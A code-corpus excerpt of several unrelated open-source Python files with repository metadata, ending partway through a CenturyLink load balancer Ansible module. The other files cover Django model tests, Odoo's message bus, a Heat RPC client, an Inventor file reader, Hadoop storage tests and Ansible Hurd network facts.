class TrainStation(Station):
zone = models.IntegerField()
class User(models.Model):
username = models.CharField(max_length=30, unique=True)
class Profile(User):
profile_id = models.AutoField(primary_key=True)
extra = models.CharField(max_length=30, blank=True)
# Check concrete + concrete -> concrete -> concrete
class Politician(models.Model):
politician_id = models.AutoField(primary_key=True)
title = models.CharField(max_length=50)
class Congressman(Person, Politician):
state = models.CharField(max_length=2)
class Senator(Congressman):
pass
| bsd-3-clause |
rotofly/odoo | addons/bus/bus.py | 325 | 7324 | # -*- coding: utf-8 -*-
import datetime
import json
import logging
import select
import threading
import time
import random
import simplejson
import openerp
from openerp.osv import osv, fields
from openerp.http import request
from openerp.tools.misc import DEFAULT_SERVER_DATETIME_FORMAT
_logger = logging.getLogger(__name__)
TIMEOUT = 50
#----------------------------------------------------------
# Bus
#----------------------------------------------------------
def json_dump(v):
return simplejson.dumps(v, separators=(',', ':'))
def hashable(key):
if isinstance(key, list):
key = tuple(key)
return key
class ImBus(osv.Model):
_name = 'bus.bus'
_columns = {
'id' : fields.integer('Id'),
'create_date' : fields.datetime('Create date'),
'channel' : fields.char('Channel'),
'message' : fields.char('Message'),
}
def gc(self, cr, uid):
timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT*2)
domain = [('create_date', '<', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
ids = self.search(cr, openerp.SUPERUSER_ID, domain)
self.unlink(cr, openerp.SUPERUSER_ID, ids)
def sendmany(self, cr, uid, notifications):
channels = set()
for channel, message in notifications:
channels.add(channel)
values = {
"channel" : json_dump(channel),
"message" : json_dump(message)
}
self.pool['bus.bus'].create(cr, openerp.SUPERUSER_ID, values)
cr.commit()
if random.random() < 0.01:
self.gc(cr, uid)
if channels:
with openerp.sql_db.db_connect('postgres').cursor() as cr2:
cr2.execute("notify imbus, %s", (json_dump(list(channels)),))
def sendone(self, cr, uid, channel, message):
self.sendmany(cr, uid, [[channel, message]])
def poll(self, cr, uid, channels, last=0):
# first poll return the notification in the 'buffer'
if last == 0:
timeout_ago = datetime.datetime.utcnow()-datetime.timedelta(seconds=TIMEOUT)
domain = [('create_date', '>', timeout_ago.strftime(DEFAULT_SERVER_DATETIME_FORMAT))]
else:
# else returns the unread notifications
domain = [('id','>',last)]
channels = [json_dump(c) for c in channels]
domain.append(('channel','in',channels))
notifications = self.search_read(cr, openerp.SUPERUSER_ID, domain)
return [{"id":notif["id"], "channel": simplejson.loads(notif["channel"]), "message":simplejson.loads(notif["message"])} for notif in notifications]
class ImDispatch(object):
def __init__(self):
self.channels = {}
def poll(self, dbname, channels, last, timeout=TIMEOUT):
# Dont hang ctrl-c for a poll request, we need to bypass private
# attribute access because we dont know before starting the thread that
# it will handle a longpolling request
if not openerp.evented:
current = threading.current_thread()
current._Thread__daemonic = True
# rename the thread to avoid tests waiting for a longpolling
current.setName("openerp.longpolling.request.%s" % current.ident)
registry = openerp.registry(dbname)
# immediatly returns if past notifications exist
with registry.cursor() as cr:
notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
# or wait for future ones
if not notifications:
event = self.Event()
for c in channels:
self.channels.setdefault(hashable(c), []).append(event)
try:
event.wait(timeout=timeout)
with registry.cursor() as cr:
notifications = registry['bus.bus'].poll(cr, openerp.SUPERUSER_ID, channels, last)
except Exception:
# timeout
pass
return notifications
def loop(self):
""" Dispatch postgres notifications to the relevant polling threads/greenlets """
_logger.info("Bus.loop listen imbus on db postgres")
with openerp.sql_db.db_connect('postgres').cursor() as cr:
conn = cr._cnx
cr.execute("listen imbus")
cr.commit();
while True:
if select.select([conn], [], [], TIMEOUT) == ([],[],[]):
pass
else:
conn.poll()
channels = []
while conn.notifies:
channels.extend(json.loads(conn.notifies.pop().payload))
# dispatch to local threads/greenlets
events = set()
for c in channels:
events.update(self.channels.pop(hashable(c),[]))
for e in events:
e.set()
def run(self):
while True:
try:
self.loop()
except Exception, e:
_logger.exception("Bus.loop error, sleep and retry")
time.sleep(TIMEOUT)
def start(self):
if openerp.evented:
# gevent mode
import gevent
self.Event = gevent.event.Event
gevent.spawn(self.run)
elif openerp.multi_process:
# disabled in prefork mode
return
else:
# threaded mode
self.Event = threading.Event
t = threading.Thread(name="%s.Bus" % __name__, target=self.run)
t.daemon = True
t.start()
return self
dispatch = ImDispatch().start()
#----------------------------------------------------------
# Controller
#----------------------------------------------------------
class Controller(openerp.http.Controller):
""" Examples:
openerp.jsonRpc('/longpolling/poll','call',{"channels":["c1"],last:0}).then(function(r){console.log(r)});
openerp.jsonRpc('/longpolling/send','call',{"channel":"c1","message":"m1"});
openerp.jsonRpc('/longpolling/send','call',{"channel":"c2","message":"m2"});
"""
@openerp.http.route('/longpolling/send', type="json", auth="public")
def send(self, channel, message):
if not isinstance(channel, basestring):
raise Exception("bus.Bus only string channels are allowed.")
registry, cr, uid, context = request.registry, request.cr, request.session.uid, request.context
return registry['bus.bus'].sendone(cr, uid, channel, message)
# override to add channels
def _poll(self, dbname, channels, last, options):
request.cr.close()
request._cr = None
return dispatch.poll(dbname, channels, last)
@openerp.http.route('/longpolling/poll', type="json", auth="public")
def poll(self, channels, last, options=None):
if options is None:
options = {}
if not dispatch:
raise Exception("bus.Bus unavailable")
if [c for c in channels if not isinstance(c, basestring)]:
print channels
raise Exception("bus.Bus only string channels are allowed.")
return self._poll(request.db, channels, last, options)
# vim:et:
| agpl-3.0 |
gonzolino/heat | heat/rpc/listener_client.py | 10 | 1473 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client side of the heat worker RPC API."""
from oslo_config import cfg
import oslo_messaging as messaging
from heat.common import messaging as rpc_messaging
from heat.rpc import api as rpc_api
cfg.CONF.import_opt('engine_life_check_timeout', 'heat.common.config')
class EngineListenerClient(object):
"""Client side of the heat listener RPC API.
API version history::
1.0 - Initial version.
"""
BASE_RPC_API_VERSION = '1.0'
def __init__(self, engine_id):
_client = rpc_messaging.get_rpc_client(
topic=rpc_api.LISTENER_TOPIC,
version=self.BASE_RPC_API_VERSION,
server=engine_id)
self._client = _client.prepare(
timeout=cfg.CONF.engine_life_check_timeout)
def is_alive(self, ctxt):
try:
return self._client.call(ctxt, 'listening')
except messaging.MessagingTimeout:
return False
| apache-2.0 |
pombredanne/metamorphosys-desktop | metamorphosys/META/analysis_tools/PYTHON_RICARDO/output_closures/scripts/load_inventor.py | 7 | 2996 | # -*- coding: utf-8 -*-
"""
Created on Mon Aug 12 16:56:42 2013
@author: tgb
"""
from cStringIO import StringIO
import re
import numpy as np
def read_iv_file(f_name):
"""
Return a list of parts from the inventor file called ``f_name``.
Each entry in the part list is a tuple ``(x, y, z, tris, edges)``. ``x``, ``y`` and ``z`` are
1D numpy arrays containing the node positions, ``tris`` is numpy array of triples indexing
which nodes make the triangles and ``edges`` contains which nodes make the sharp edges in the
part.
"""
with open(f_name, "r") as iv_file:
point_sets = []
n_str = None
p_str = None
in_points = False
in_normals = False
for line in iv_file:
if in_points:
if "]" in line:
in_points = False
p_str.write(line[:line.find("]")])
point_sets.append(_get_points_tris(p_str.getvalue(),
n_str.getvalue()))
else:
p_str.write(line)
elif in_normals:
if "]" in line:
in_normals = False
n_str.write(line[:line.find("]")])
else:
n_str.write(line)
else:
if re.search(r"point\s+\[", line):
p_str = StringIO()
in_points = True
p_str.write(line[line.find("[") + 1:])
if re.search(r"vector\s+\[", line):
n_str = StringIO()
in_normals = True
n_str.write(line[line.find("[") + 1:])
total_verts = total_tris = 0
t_x = np.empty((0,), dtype=np.float32)
t_y = np.empty((0,), dtype=np.float32)
t_z = np.empty((0,), dtype=np.float32)
t_tris = np.zeros((0, 3), dtype=np.uint32)
for x, y, z, triangles in point_sets:
total_verts += len(x)
total_tris += len(triangles)
t_tris = np.concatenate((t_tris, triangles + len(t_x)))
t_x = np.concatenate((t_x, x))
t_y = np.concatenate((t_y, y))
t_z = np.concatenate((t_z, z))
return {"x" : t_x, "y" : t_y, "z" : t_z, "tris" : t_tris}
def _get_points_tris(point_set, norm_sets):
"""
Merge points together (unless ``merge_nodes == False``) and build triangle and edge lists.
Returns x, y, z, tris, edges
"""
point_set = re.sub(r",\n", " ", point_set).split()
point_set = np.array([float(x) for x in point_set], dtype=np.float32)
point_set.shape = (point_set.size / 3, 3)
tris = np.arange(point_set.size / 3, dtype=np.uint32)
tris.shape = (tris.size / 3, 3)
return (point_set[:, 0], point_set[:, 1], point_set[:, 2], tris)
| mit |
Nextzero/hadoop-2.6.0-cdh5.4.3 | hadoop-mapreduce1-project/src/contrib/cloud/src/test/py/teststorage.py | 16 | 6086 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import simplejson as json
from StringIO import StringIO
from hadoop.cloud.storage import MountableVolume
from hadoop.cloud.storage import JsonVolumeManager
from hadoop.cloud.storage import JsonVolumeSpecManager
spec = {
"master": ({"size_gb":"8", "mount_point":"/", "device":"/dev/sdj",
"snapshot_id": "snap_1"},
),
"slave": ({"size_gb":"8", "mount_point":"/", "device":"/dev/sdj",
"snapshot_id": "snap_2"},
{"size_gb":"10", "mount_point":"/data1", "device":"/dev/sdk",
"snapshot_id": "snap_3"},
)
}
class TestJsonVolumeSpecManager(unittest.TestCase):
def test_volume_specs_for_role(self):
input = StringIO(json.dumps(spec))
volume_spec_manager = JsonVolumeSpecManager(input)
master_specs = volume_spec_manager.volume_specs_for_role("master")
self.assertEqual(1, len(master_specs))
self.assertEqual("/", master_specs[0].mount_point)
self.assertEqual("8", master_specs[0].size)
self.assertEqual("/dev/sdj", master_specs[0].device)
self.assertEqual("snap_1", master_specs[0].snapshot_id)
slave_specs = volume_spec_manager.volume_specs_for_role("slave")
self.assertEqual(2, len(slave_specs))
self.assertEqual("snap_2", slave_specs[0].snapshot_id)
self.assertEqual("snap_3", slave_specs[1].snapshot_id)
self.assertRaises(KeyError, volume_spec_manager.volume_specs_for_role,
"no-such-role")
def test_get_mappings_string_for_role(self):
input = StringIO(json.dumps(spec))
volume_spec_manager = JsonVolumeSpecManager(input)
master_mappings = volume_spec_manager.get_mappings_string_for_role("master")
self.assertEqual("/,/dev/sdj", master_mappings)
slave_mappings = volume_spec_manager.get_mappings_string_for_role("slave")
self.assertEqual("/,/dev/sdj;/data1,/dev/sdk", slave_mappings)
self.assertRaises(KeyError,
volume_spec_manager.get_mappings_string_for_role,
"no-such-role")
class TestJsonVolumeManager(unittest.TestCase):
def tearDown(self):
try:
os.remove("volumemanagertest.json")
except OSError:
pass
def test_add_instance_storage_for_role(self):
volume_manager = JsonVolumeManager("volumemanagertest.json")
self.assertEqual(0,
len(volume_manager.get_instance_storage_for_role("master")))
self.assertEqual(0, len(volume_manager.get_roles()))
volume_manager.add_instance_storage_for_role("master",
[MountableVolume("vol_1", "/",
"/dev/sdj")])
master_storage = volume_manager.get_instance_storage_for_role("master")
self.assertEqual(1, len(master_storage))
master_storage_instance0 = master_storage[0]
self.assertEqual(1, len(master_storage_instance0))
master_storage_instance0_vol0 = master_storage_instance0[0]
self.assertEqual("vol_1", master_storage_instance0_vol0.volume_id)
self.assertEqual("/", master_storage_instance0_vol0.mount_point)
self.assertEqual("/dev/sdj", master_storage_instance0_vol0.device)
volume_manager.add_instance_storage_for_role("slave",
[MountableVolume("vol_2", "/",
"/dev/sdj")])
self.assertEqual(1,
len(volume_manager.get_instance_storage_for_role("master")))
slave_storage = volume_manager.get_instance_storage_for_role("slave")
self.assertEqual(1, len(slave_storage))
slave_storage_instance0 = slave_storage[0]
self.assertEqual(1, len(slave_storage_instance0))
slave_storage_instance0_vol0 = slave_storage_instance0[0]
self.assertEqual("vol_2", slave_storage_instance0_vol0.volume_id)
self.assertEqual("/", slave_storage_instance0_vol0.mount_point)
self.assertEqual("/dev/sdj", slave_storage_instance0_vol0.device)
volume_manager.add_instance_storage_for_role("slave",
[MountableVolume("vol_3", "/", "/dev/sdj"),
MountableVolume("vol_4", "/data1", "/dev/sdk")])
self.assertEqual(1,
len(volume_manager.get_instance_storage_for_role("master")))
slave_storage = volume_manager.get_instance_storage_for_role("slave")
self.assertEqual(2, len(slave_storage))
slave_storage_instance0 = slave_storage[0]
slave_storage_instance1 = slave_storage[1]
self.assertEqual(1, len(slave_storage_instance0))
self.assertEqual(2, len(slave_storage_instance1))
slave_storage_instance1_vol0 = slave_storage_instance1[0]
slave_storage_instance1_vol1 = slave_storage_instance1[1]
self.assertEqual("vol_3", slave_storage_instance1_vol0.volume_id)
self.assertEqual("/", slave_storage_instance1_vol0.mount_point)
self.assertEqual("/dev/sdj", slave_storage_instance1_vol0.device)
self.assertEqual("vol_4", slave_storage_instance1_vol1.volume_id)
self.assertEqual("/data1", slave_storage_instance1_vol1.mount_point)
self.assertEqual("/dev/sdk", slave_storage_instance1_vol1.device)
roles = volume_manager.get_roles()
self.assertEqual(2, len(roles))
self.assertTrue("slave" in roles)
self.assertTrue("master" in roles)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
pshen/ansible | lib/ansible/module_utils/facts/network/hurd.py | 192 | 3142 | # This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from ansible.module_utils.facts.network.base import Network, NetworkCollector
class HurdPfinetNetwork(Network):
"""
This is a GNU Hurd specific subclass of Network. It use fsysopts to
get the ip address and support only pfinet.
"""
platform = 'GNU'
_socket_dir = '/servers/socket/'
def populate(self, collected_facts=None):
network_facts = {}
fsysopts_path = self.module.get_bin_path('fsysopts')
if fsysopts_path is None:
return network_facts
socket_path = None
for l in ('inet', 'inet6'):
link = os.path.join(self._socket_dir, l)
if os.path.exists(link):
socket_path = link
break
# FIXME: extract to method
# FIXME: exit early on falsey socket_path and un-indent whole block
if socket_path:
rc, out, err = self.module.run_command([fsysopts_path, '-L', socket_path])
# FIXME: build up a interfaces datastructure, then assign into network_facts
network_facts['interfaces'] = []
for i in out.split():
if '=' in i and i.startswith('--'):
k, v = i.split('=', 1)
# remove '--'
k = k[2:]
if k == 'interface':
# remove /dev/ from /dev/eth0
v = v[5:]
network_facts['interfaces'].append(v)
network_facts[v] = {
'active': True,
'device': v,
'ipv4': {},
'ipv6': [],
}
current_if = v
elif k == 'address':
network_facts[current_if]['ipv4']['address'] = v
elif k == 'netmask':
network_facts[current_if]['ipv4']['netmask'] = v
elif k == 'address6':
address, prefix = v.split('/')
network_facts[current_if]['ipv6'].append({
'address': address,
'prefix': prefix,
})
return network_facts
class HurdNetworkCollector(NetworkCollector):
_platform = 'GNU'
_fact_class = HurdPfinetNetwork
| gpl-3.0 |
kovacsbalu/ansible-modules-extras | cloud/centurylink/clc_loadbalancer.py | 49 | 34308 | #!/usr/bin/python
#
# Copyright (c) 2015 CenturyLink
#
# This file is part of Ansible.
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>
#
DOCUMENTATION = '''
module: clc_loadbalancer
short_description: Create, Delete shared loadbalancers in CenturyLink Cloud.
description:
- An Ansible module to Create, Delete shared loadbalancers in CenturyLink Cloud.
version_added: "2.0"
options:
name:
description:
- The name of the loadbalancer
required: True
description:
description:
- A description for the loadbalancer
required: False
default: None
alias:
description:
- The alias of your CLC Account
required: True
location:
description:
- The location of the datacenter where the load balancer resides in
required: True
method:
description:
-The balancing method for the load balancer pool
required: False
default: None
choices: ['leastConnection', 'roundRobin']
persistence:
description:
- The persistence method for the load balancer
required: False
default: None
choices: ['standard', 'sticky']
port:
description:
- Port to configure on the public-facing side of the load balancer pool
required: False
default: None
choices: [80, 443]
nodes:
description:
- A list of nodes that needs to be added to the load balancer pool
required: False
default: []
status:
description:
- The status of the loadbalancer
required: False
default: enabled
choices: ['enabled', 'disabled']
state:
description:
- Whether to create or delete the load balancer pool
required: False
default: present
choices: ['present', 'absent', 'port_absent', 'nodes_present', 'nodes_absent']
'''
EXAMPLES = '''
# Note - You must set the CLC_V2_API_USERNAME And CLC_V2_API_PASSWD Environment variables before running these examples
- name: Create Loadbalancer
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: present
- name: Add node to an existing loadbalancer pool
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.234', 'privatePort': 80 }
state: nodes_present
- name: Remove node from an existing loadbalancer pool
hosts: localhost
connection: local
tasks:
- name: Actually Create things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.234', 'privatePort': 80 }
state: nodes_absent
- name: Delete LoadbalancerPool
hosts: localhost
connection: local
tasks:
- name: Actually Delete things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: port_absent
- name: Delete Loadbalancer
hosts: localhost
connection: local
tasks:
- name: Actually Delete things
clc_loadbalancer:
name: test
description: test
alias: TEST
location: WA1
port: 443
nodes:
- { 'ipAddress': '10.11.22.123', 'privatePort': 80 }
state: absent
requirements:
- python = 2.7
- requests >= 2.5.0
- clc-sdk
notes:
- To use this module, it is required to set the below environment variables which enables access to the
Centurylink Cloud
- CLC_V2_API_USERNAME, the account login id for the centurylink cloud
- CLC_V2_API_PASSWORD, the account password for the centurylink cloud
- Alternatively, the module accepts the API token and account alias. The API token can be generated using the
CLC account login and password via the HTTP api call @ https://api.ctl.io/v2/authentication/login
- CLC_V2_API_TOKEN, the API token generated from https://api.ctl.io/v2/authentication/login
- CLC_ACCT_ALIAS, the account alias associated with the centurylink cloud
- Users can set CLC_V2_API_URL to specify an endpoint for pointing to a different CLC environment.
'''
__version__ = '${version}'
from time import sleep
from distutils.version import LooseVersion
try:
import requests
except ImportError:
REQUESTS_FOUND = False
else:
REQUESTS_FOUND = True
#
# Requires the clc-python-sdk.
# sudo pip install clc-sdk
#
try:
import clc as clc_sdk
from clc import APIFailedResponse
except ImportError:
CLC_FOUND = False
clc_sdk = None
else:
CLC_FOUND = True
class ClcLoadBalancer:
clc = None
def __init__(self, module):
"""
Construct module
"""
self.clc = clc_sdk
self.module = module
self.lb_dict = {}
if not CLC_FOUND:
self.module.fail_json(
msg='clc-python-sdk required for this module')
if not REQUESTS_FOUND:
self.module.fail_json(
msg='requests library is required for this module')
if requests.__version__ and LooseVersion(
requests.__version__) < LooseVersion('2.5.0'):
self.module.fail_json(
msg='requests library version should be >= 2.5.0')
self._set_user_agent(self.clc)
def process_request(self):
"""
Execute the main code path, and handle the request
:return: none
"""
changed = False
result_lb = None
loadbalancer_name = self.module.params.get('name')
loadbalancer_alias = self.module.params.get('alias')
loadbalancer_location = self.module.params.get('location')
loadbalancer_description = self.module.params.get('description')
loadbalancer_port = self.module.params.get('port')
loadbalancer_method = self.module.params.get('method')
loadbalancer_persistence = self.module.params.get('persistence')
loadbalancer_nodes = self.module.params.get('nodes')
loadbalancer_status = self.module.params.get('status')
state = self.module.params.get('state')
if loadbalancer_description is None:
loadbalancer_description = loadbalancer_name
self._set_clc_credentials_from_env()
self.lb_dict = self._get_loadbalancer_list(
alias=loadbalancer_alias,
location=loadbalancer_location)
if state == 'present':
changed, result_lb, lb_id = self.ensure_loadbalancer_present(
name=loadbalancer_name,
alias=loadbalancer_alias,
location=loadbalancer_location,
description=loadbalancer_description,
status=loadbalancer_status)
if loadbalancer_port:
changed, result_pool, pool_id = self.ensure_loadbalancerpool_present(
lb_id=lb_id,
alias=loadbalancer_alias,
location=loadbalancer_location,
method=loadbalancer_method,
persistence=loadbalancer_persistence,
port=loadbalancer_port)
if loadbalancer_nodes:
changed, result_nodes = self.ensure_lbpool_nodes_set(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
elif state == 'absent':
changed, result_lb = self.ensure_loadbalancer_absent(
name=loadbalancer_name,
alias=loadbalancer_alias,
location=loadbalancer_location)
elif state == 'port_absent':
changed, result_lb = self.ensure_loadbalancerpool_absent(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port)
elif state == 'nodes_present':
changed, result_lb = self.ensure_lbpool_nodes_present(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
elif state == 'nodes_absent':
changed, result_lb = self.ensure_lbpool_nodes_absent(
alias=loadbalancer_alias,
location=loadbalancer_location,
name=loadbalancer_name,
port=loadbalancer_port,
nodes=loadbalancer_nodes)
self.module.exit_json(changed=changed, loadbalancer=result_lb)
def ensure_loadbalancer_present(
self, name, alias, location, description, status):
"""
Checks to see if a load balancer exists and creates one if it does not.
:param name: Name of loadbalancer
:param alias: Alias of account
:param location: Datacenter
:param description: Description of loadbalancer
:param status: Enabled / Disabled
:return: (changed, result, lb_id)
changed: Boolean whether a change was made
result: The result object from the CLC load balancer request
lb_id: The load balancer id
"""
changed = False
result = name
lb_id = self._loadbalancer_exists(name=name)
if not lb_id:
if not self.module.check_mode:
result = self.create_loadbalancer(name=name,
alias=alias,
location=location,
description=description,
status=status)
lb_id = result.get('id')
changed = True
return changed, result, lb_id
def ensure_loadbalancerpool_present(
self, lb_id, alias, location, method, persistence, port):
"""
Checks to see if a load balancer pool exists and creates one if it does not.
:param lb_id: The loadbalancer id
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param method: the load balancing method
:param persistence: the load balancing persistence type
:param port: the port that the load balancer will listen on
:return: (changed, group, pool_id) -
changed: Boolean whether a change was made
result: The result from the CLC API call
pool_id: The string id of the load balancer pool
"""
changed = False
result = port
if not lb_id:
return changed, None, None
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if not pool_id:
if not self.module.check_mode:
result = self.create_loadbalancerpool(
alias=alias,
location=location,
lb_id=lb_id,
method=method,
persistence=persistence,
port=port)
pool_id = result.get('id')
changed = True
return changed, result, pool_id
def ensure_loadbalancer_absent(self, name, alias, location):
"""
Checks to see if a load balancer exists and deletes it if it does
:param name: Name of the load balancer
:param alias: Alias of account
:param location: Datacenter
:return: (changed, result)
changed: Boolean whether a change was made
result: The result from the CLC API Call
"""
changed = False
result = name
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
if not self.module.check_mode:
result = self.delete_loadbalancer(alias=alias,
location=location,
name=name)
changed = True
return changed, result
def ensure_loadbalancerpool_absent(self, alias, location, name, port):
"""
Checks to see if a load balancer pool exists and deletes it if it does
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer listens on
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
result = None
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed = True
if not self.module.check_mode:
result = self.delete_loadbalancerpool(
alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id)
else:
result = "Pool doesn't exist"
else:
result = "LB Doesn't Exist"
return changed, result
def ensure_lbpool_nodes_set(self, alias, location, name, port, nodes):
"""
Checks to see if the provided list of nodes exist for the pool
and set the nodes if any in the list those doesn't exist
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: The list of nodes to be updated to the pool
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
result = {}
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
nodes_exist = self._loadbalancerpool_nodes_exists(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_check=nodes)
if not nodes_exist:
changed = True
result = self.set_loadbalancernodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def ensure_lbpool_nodes_present(self, alias, location, name, port, nodes):
"""
Checks to see if the provided list of nodes exist for the pool and add the missing nodes to the pool
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: the list of nodes to be added
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed, result = self.add_lbpool_nodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_add=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def ensure_lbpool_nodes_absent(self, alias, location, name, port, nodes):
"""
Checks to see if the provided list of nodes exist for the pool and removes them if found any
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param name: the name of the load balancer
:param port: the port that the load balancer will listen on
:param nodes: the list of nodes to be removed
:return: (changed, result) -
changed: Boolean whether a change was made
result: The result from the CLC API call
"""
changed = False
lb_exists = self._loadbalancer_exists(name=name)
if lb_exists:
lb_id = self._get_loadbalancer_id(name=name)
pool_id = self._loadbalancerpool_exists(
alias=alias,
location=location,
port=port,
lb_id=lb_id)
if pool_id:
changed, result = self.remove_lbpool_nodes(alias=alias,
location=location,
lb_id=lb_id,
pool_id=pool_id,
nodes_to_remove=nodes)
else:
result = "Pool doesn't exist"
else:
result = "Load balancer doesn't Exist"
return changed, result
def create_loadbalancer(self, name, alias, location, description, status):
"""
Create a loadbalancer w/ params
:param name: Name of loadbalancer
:param alias: Alias of account
:param location: Datacenter
:param description: Description for loadbalancer to be created
:param status: Enabled / Disabled
:return: result: The result from the CLC API call
"""
result = None
try:
result = self.clc.v2.API.Call('POST',
'/v2/sharedLoadBalancers/%s/%s' % (alias,
location),
json.dumps({"name": name,
"description": description,
"status": status}))
sleep(1)
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to create load balancer "{0}". {1}'.format(
name, str(e.response_text)))
return result
def create_loadbalancerpool(
self, alias, location, lb_id, method, persistence, port):
"""
Creates a pool on the provided load balancer
:param alias: the account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param method: the load balancing method
:param persistence: the load balancing persistence type
:param port: the port that the load balancer will listen on
:return: result: The result from the create API call
"""
result = None
try:
result = self.clc.v2.API.Call(
'POST', '/v2/sharedLoadBalancers/%s/%s/%s/pools' %
(alias, location, lb_id), json.dumps(
{
"port": port, "method": method, "persistence": persistence
}))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to create pool for load balancer id "{0}". {1}'.format(
lb_id, str(e.response_text)))
return result
def delete_loadbalancer(self, alias, location, name):
"""
Delete CLC loadbalancer
:param alias: Alias for account
:param location: Datacenter
:param name: Name of the loadbalancer to delete
:return: result: The result from the CLC API call
"""
result = None
lb_id = self._get_loadbalancer_id(name=name)
try:
result = self.clc.v2.API.Call(
'DELETE', '/v2/sharedLoadBalancers/%s/%s/%s' %
(alias, location, lb_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to delete load balancer "{0}". {1}'.format(
name, str(e.response_text)))
return result
def delete_loadbalancerpool(self, alias, location, lb_id, pool_id):
"""
Delete the pool on the provided load balancer
:param alias: The account alias
:param location: the datacenter the load balancer resides in
:param lb_id: the id string of the load balancer
:param pool_id: the id string of the load balancer pool
:return: result: The result from the delete API call
"""
result = None
try:
result = self.clc.v2.API.Call(
'DELETE', '/v2/sharedLoadBalancers/%s/%s/%s/pools/%s' %
(alias, location, lb_id, pool_id))
except APIFailedResponse as e:
self.module.fail_json(
msg='Unable to delete pool for load balancer id "{0}". {1}'.format(
lb_id, str(e.response_text)))
return result
def _get_loadbalancer_id(self, name):
"""
